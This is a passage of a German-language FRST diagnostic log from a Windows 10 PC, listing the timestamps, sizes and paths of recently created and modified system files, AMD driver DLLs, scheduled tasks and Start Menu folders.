2017-05-07 18:11 - 2017-05-07 18:11 - 00095584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\imagehlp.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00094720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmjpegdec.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\asycfilt.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00081408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmjpegdec.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00078848 _____ (Microsoft Corporation) C:\WINDOWS\system32\offreg.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00078336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\offreg.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00052736 _____ (Microsoft Corporation) C:\WINDOWS\system32\musdialoghandlers.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\system32\catsrvps.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00047104 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00038912 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00032004 _____ C:\WINDOWS\system32\edgehtmlpluginpolicy.bin
2017-05-07 18:09 - 2017-05-07 18:09 - 00008192 _____ C:\WINDOWS\system32\config\userdiff
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\WINDOWS\SysWOW64\XPSViewer
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files\Reference Assemblies
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files\MSBuild
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files (x86)\Reference Assemblies
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files (x86)\MSBuild
2017-05-07 18:09 - 2017-05-07 17:13 - 00000000 ____D C:\WINDOWS\ServiceProfiles
2017-05-07 18:09 - 2017-02-10 12:26 - 01166520 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationNative_v0300.dll
2017-05-07 18:09 - 2017-02-10 12:26 - 00124624 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationCFFRasterizerNative_v0300.dll
2017-05-07 18:09 - 2017-02-10 12:26 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\system32\TsWpfWrp.exe
2017-05-07 18:09 - 2017-02-10 12:21 - 00778936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationNative_v0300.dll
2017-05-07 18:09 - 2017-02-10 12:21 - 00103120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
2017-05-07 18:09 - 2017-02-10 12:21 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TsWpfWrp.exe
2017-05-07 17:23 - 2017-05-21 21:01 - 01992350 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-05-07 17:18 - 2017-05-07 17:18 - 00007623 _____ C:\WINDOWS\diagwrn.xml
2017-05-07 17:18 - 2017-05-07 17:18 - 00007623 _____ C:\WINDOWS\diagerr.xml
2017-05-07 17:17 - 2017-05-21 20:55 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-05-07 17:17 - 2017-05-07 21:26 - 00003268 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task v2
2017-05-07 17:17 - 2017-05-07 17:20 - 00004440 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater
2017-05-07 17:17 - 2017-05-07 17:17 - 00023140 _____ C:\WINDOWS\System32\Tasks\{0E0E0947-0F0F-7D0F-7D11-0E0F78051104}
2017-05-07 17:17 - 2017-05-07 17:17 - 00003556 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2017-05-07 17:17 - 2017-05-07 17:17 - 00003332 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2017-05-07 17:17 - 2017-05-07 17:17 - 00003282 _____ C:\WINDOWS\System32\Tasks\{E0FE36B0-5755-811B-E0F2-0AF91728DCC9}
2017-05-07 17:17 - 2017-05-07 17:17 - 00003084 _____ C:\WINDOWS\System32\Tasks\{522333AA-23D9-85D6-489B-224F78B46908}
2017-05-07 17:17 - 2017-05-07 17:17 - 00002736 _____ C:\WINDOWS\System32\Tasks\AutoKMS
2017-05-07 17:17 - 2017-05-07 17:17 - 00002668 _____ C:\WINDOWS\System32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864
2017-05-07 17:17 - 2017-05-07 17:17 - 00002580 _____ C:\WINDOWS\System32\Tasks\SamsungMagician
2017-05-07 17:17 - 2017-05-07 17:17 - 00002388 _____ C:\WINDOWS\System32\Tasks\Bitdefender AgentTask_AD394AE64E874073B10A89FEEC305A3C
2017-05-07 17:17 - 2017-05-07 17:17 - 00000000 ____D C:\WINDOWS\System32\Tasks\Safer-Networking
2017-05-07 17:17 - 2017-05-07 17:17 - 00000000 ____D C:\WINDOWS\System32\Tasks\ASUS
2017-05-07 17:17 - 2017-05-07 17:17 - 00000000 ____D C:\ProgramData\USOShared
2017-05-07 17:15 - 2017-05-07 17:15 - 00001576 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2017-05-07 17:15 - 2017-03-18 22:56 - 02233344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2017-05-07 17:14 - 2017-05-14 22:59 - 00000000 ____D C:\Users\Dino
2017-05-07 17:14 - 2017-05-07 17:16 - 00000000 ____D C:\WINDOWS\system32\config\bbimigrate
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Vorlagen
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Startmenü
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Netzwerkumgebung
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Lokale Einstellungen
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Eigene Dateien
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Druckumgebung
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\AppData\Local\Verlauf
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\AppData\Local\Anwendungsdaten
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Anwendungsdaten
2017-05-07 17:13 - 2017-05-21 20:55 - 00342672 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2017-05-07 17:13 - 2017-05-21 20:55 - 00065536 _____ C:\WINDOWS\system32\spu_storage.bin
2017-05-07 17:13 - 2017-05-17 21:18 - 00000000 ____D C:\Program Files\AMD
2017-05-07 17:13 - 2017-05-16 18:16 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2017-05-07 17:13 - 2017-05-07 17:14 - 00000000 ____D C:\Program Files (x86)\ASUS
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_ASMBSW_01_11_00.Wdf
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_Kernel_TeeDriverx64_01011.Wdf
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____H C:\ProgramData\DP45977C.lfl
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\WINDOWS\SysWOW64\RTCOM
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\Program Files\Realtek
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\Program Files\Common Files\ATI Technologies
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\Program Files\ASUS
2017-05-07 17:13 - 2013-07-04 03:32 - 00028672 _____ (ASUSTek Computer Inc.) C:\WINDOWS\SysWOW64\AsIO.dll
2017-05-07 17:13 - 2013-07-04 03:32 - 00015232 _____ C:\WINDOWS\SysWOW64\Drivers\AsIO.sys
2017-05-07 13:03 - 2017-05-07 21:24 - 00000000 ___DC C:\WINDOWS\Panther
2017-05-03 17:47 - 2017-05-03 17:47 - 00001256 _____ C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Update- und Datenschutzeinstellungen.lnk
2017-05-03 17:47 - 2017-05-03 17:47 - 00000000 ____D C:\Users\Dino\AppData\Local\UNP
2017-05-03 17:21 - 2017-05-07 17:16 - 00000000 ____D C:\WINDOWS\system32\UNP
2017-05-03 17:21 - 2017-05-03 17:22 - 00000000 ____D C:\Program Files\UNP
2017-05-01 12:45 - 2017-05-07 17:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Problem Report Wizard
2017-05-01 12:45 - 2017-05-01 12:45 - 00000000 ____D C:\Users\Dino\AppData\LocalLow\AMD
==================== Ein Monat: Geänderte Dateien und Ordner ========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
2017-05-21 21:23 - 2016-12-06 18:58 - 00000000 ____D C:\Users\Dino\AppData\LocalLow\Mozilla
2017-05-21 21:01 - 2017-03-20 06:41 - 00877602 _____ C:\WINDOWS\system32\perfh007.dat
2017-05-21 21:01 - 2017-03-20 06:41 - 00184122 _____ C:\WINDOWS\system32\perfc007.dat
2017-05-21 20:56 - 2017-02-05 21:11 - 00000000 ____D C:\Program Files\Bitdefender Agent
2017-05-21 20:56 - 2015-08-16 13:47 - 00000000 ___RD C:\Users\Dino\OneDrive
2017-05-21 20:55 - 2017-03-18 13:40 - 00786432 _____ C:\WINDOWS\system32\config\BBI
2017-05-21 20:55 - 2017-02-05 21:39 - 00000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2017-05-21 20:55 - 2017-02-05 21:38 - 00014132 _____ C:\bdlog.txt
2017-05-21 20:55 - 2015-04-25 17:41 - 00000000 ____D C:\Program Files (x86)\Steam
2017-05-21 20:54 - 2017-02-05 21:41 - 00000085 _____ C:\WINDOWS\wininit.ini
2017-05-21 20:54 - 2017-02-05 21:40 - 00000000 ____D C:\ProgramData\Spybot - Search & Destroy
2017-05-21 12:27 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\AppReadiness
2017-05-20 14:33 - 2017-03-18 23:03 - 00000000 ___HD C:\Program Files\WindowsApps
2017-05-19 14:20 - 2017-03-18 23:03 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2017-05-19 14:20 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Common Files\System
2017-05-19 14:20 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2017-05-19 14:20 - 2015-10-30 20:47 - 00000000 ____D C:\WINDOWS\ShellNew
2017-05-19 14:20 - 2013-08-22 15:25 - 00000076 _____ C:\WINDOWS\win.ini
2017-05-19 14:16 - 2017-02-05 20:54 - 00001079 _____ C:\Users\Public\Desktop\Revo Uninstaller.lnk
2017-05-19 14:16 - 2017-02-05 20:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller
2017-05-17 21:22 - 2017-03-18 13:40 - 00032768 _____ C:\WINDOWS\system32\config\ELAM
2017-05-17 21:18 - 2017-03-18 23:01 - 00000000 ____D C:\WINDOWS\INF
2017-05-17 21:18 - 2015-04-25 06:40 - 00000000 ____D C:\AMD
2017-05-16 18:06 - 2017-04-14 21:33 - 00924544 _____ (AMD) C:\WINDOWS\system32\coinst_17.10.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00551808 _____ C:\WINDOWS\system32\dgtrayicon.exe
2017-05-16 18:06 - 2017-04-14 21:33 - 00546688 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\Rapidfire64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00531328 _____ C:\WINDOWS\system32\GameManager64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00478080 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\Rapidfire.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00365440 _____ C:\WINDOWS\SysWOW64\GameManager32.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00278400 _____ C:\WINDOWS\system32\clinfo.exe
2017-05-16 18:06 - 2017-04-14 21:33 - 00276352 _____ C:\WINDOWS\system32\hsa-thunk64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00242048 _____ C:\WINDOWS\SysWOW64\hsa-thunk.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00191360 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\mantle64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00169856 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\mantleaxl64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00167808 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atisamu64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00150912 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\mantle32.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00135040 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\mantleaxl32.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00133504 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atisamu32.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00044920 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\RapidFireServer64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00042368 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\RapidFireServer.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 01516416 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atiadlxx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 01040768 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atiadlxy.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 01040768 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atiadlxx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00777088 _____ (AMD) C:\WINDOWS\system32\atieclxx.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00551808 _____ (AMD) C:\WINDOWS\system32\atiesrxx.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00483712 _____ C:\WINDOWS\system32\atieah64.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00467328 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atidemgy.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00411008 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atiapfxx.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00334208 _____ C:\WINDOWS\SysWOW64\atieah32.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00245112 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atig6txx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00203648 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atigktxx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00156704 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\aticfx64.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00148440 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\aticfx32.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00122744 _____ (AMD) C:\WINDOWS\system32\atimuixx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00115072 _____ C:\WINDOWS\system32\atidxx64.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00101760 _____ C:\WINDOWS\SysWOW64\atidxx32.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00068992 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\ati2erec.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 10320248 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdvlk64.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 08479104 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdvlk32.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 02536320 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amfrt64.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 02198400 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amfrt32.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 00112512 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdxc64.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 00099192 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdxc32.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00864120 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdlvr64.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00696192 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amdlvr32.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00514424 _____ C:\WINDOWS\system32\amdgfxinfo64.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00360312 _____ C:\WINDOWS\SysWOW64\amdgfxinfo32.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00091520 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdmcl64.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00075136 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdmcl32.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00573800 _____ C:\WINDOWS\system32\amdmiracast.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00196176 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdhcp64.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00164400 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amdhcp32.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00139080 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdave64.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00131280 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atimpc64.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00131280 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdpcom64.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00116072 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdave32.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00102520 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdpcom32.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00102512 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atimpc32.dll
2017-05-12 20:28 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\rescache
2017-05-12 19:35 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\Macromed
2017-05-12 19:35 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\Macromed
2017-05-10 21:47 - 2015-08-16 13:45 - 00000000 __RHD C:\Users\Public\AccountPictures
2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\appraiser
2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\ShellExperiences
2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Windows Photo Viewer
2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2017-05-09 21:42 - 2017-03-18 22:51 - 00000000 ____D C:\WINDOWS\CbsTemp
2017-05-09 21:42 - 2015-05-01 17:30 - 00000000 ____D C:\WINDOWS\system32\MRT
2017-05-09 21:40 - 2015-05-01 17:30 - 156335152 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-05-09 21:32 - 2015-04-25 06:35 - 00000000 ____D C:\Users\Dino\AppData\Local\Packages
2017-05-09 21:23 - 2017-03-11 17:54 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-05-08 22:37 - 2017-03-11 17:54 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-05-08 21:19 - 2015-04-25 07:09 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2017-05-08 21:13 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\appcompat
2017-05-07 21:26 - 2015-08-16 13:47 - 00002419 _____ C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2017-05-07 21:24 - 2017-03-18 23:03 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2017-05-07 18:12 - 2017-03-18 23:03 - 00028672 _____ C:\WINDOWS\system32\config\BCD-Template
2017-05-07 18:11 - 2017-03-18 23:06 - 00000000 ____D C:\WINDOWS\Setup
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ___SD C:\WINDOWS\SysWOW64\F12
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ___SD C:\WINDOWS\system32\F12
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\Dism
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\Provisioning
2017-05-07 18:11 - 2017-03-18 13:40 - 00000000 ____D C:\WINDOWS\system32\Dism
2017-05-07 18:09 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\MUI
2017-05-07 18:09 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\MUI
2017-05-07 18:09 - 2017-03-18 22:56 - 00465408 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnet.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00389632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnet.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00217600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dplayx.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00067584 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnathlp.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00061440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnathlp.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00046592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpwsockx.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnsvr.exe
2017-05-07 18:09 - 2017-03-18 22:56 - 00024576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpmodemx.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00022528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnsvr.exe
2017-05-07 18:09 - 2017-03-18 22:56 - 00020480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dplaysvr.exe
2017-05-07 18:09 - 2017-03-18 22:56 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnhupnp.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnhpast.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnhupnp.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnhpast.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00006144 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnlobby.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00006144 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnaddr.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnlobby.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnaddr.dll
2017-05-07 17:20 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Windows NT
2017-05-07 17:19 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\WinBioDatabase
2017-05-07 17:19 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\Registration
2017-05-07 17:18 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\Tasks_Migrated
2017-05-07 17:17 - 2017-03-20 06:43 - 00000000 ____D C:\WINDOWS\HoloShell
2017-05-07 17:17 - 2017-03-18 23:03 - 00000000 __RSD C:\WINDOWS\Media
2017-05-07 17:17 - 2017-03-18 23:03 - 00000000 __RHD C:\Users\Public\Libraries
2017-05-07 17:17 - 2017-03-18 23:03 - 00000000 ____D C:\ProgramData\USOPrivate
2017-05-07 17:17 - 2015-08-16 13:44 - 00023056 _____ C:\WINDOWS\system32\emptyregdb.dat
2017-05-07 17:16 - 2017-03-29 15:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ElsterFormular
2017-05-07 17:16 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\LiveKernelReports
2017-05-07 17:16 - 2017-02-19 12:30 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WISO steuer Start 2017
2017-05-07 17:16 - 2017-02-05 21:15 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bitdefender 2017
2017-05-07 17:16 - 2017-01-22 16:12 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SHARKOON Drakonia
2017-05-07 17:16 - 2016-02-13 13:26 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WISO steuer Start 2016
2017-05-07 17:16 - 2015-08-22 17:13 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SimCity™
2017-05-07 17:16 - 2015-08-22 14:31 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Origin
2017-05-07 17:16 - 2015-05-24 14:37 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Unlocker
2017-05-07 17:16 - 2015-05-24 12:10 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Xbox 360 Accessories
2017-05-07 17:16 - 2015-05-24 12:00 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2017-05-07 17:16 - 2015-05-24 12:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2017-05-07 17:16 - 2015-04-26 15:41 - 00000000 ____D C:\WINDOWS\system32\STRING
2017-05-07 17:16 - 2015-04-26 15:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Canon MG5600 series Benutzerregistrierung
2017-05-07 17:16 - 2015-04-26 15:12 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2017-05-07 17:16 - 2015-04-26 14:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2017-05-07 17:16 - 2015-04-26 14:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamSpeak 3 Client
2017-05-07 17:16 - 2015-04-26 13:55 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\JDownloader
2017-05-07 17:16 - 2015-04-26 13:38 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StarCraft II
2017-05-07 17:16 - 2015-04-26 13:35 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Battle.net
2017-05-07 17:16 - 2015-04-25 17:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam
2017-05-07 17:16 - 2015-04-25 07:59 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CrystalDiskInfo
2017-05-07 17:16 - 2015-04-25 07:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Samsung Magician
2017-05-07 17:16 - 2015-04-25 07:08 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ASUS
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\lv-LV
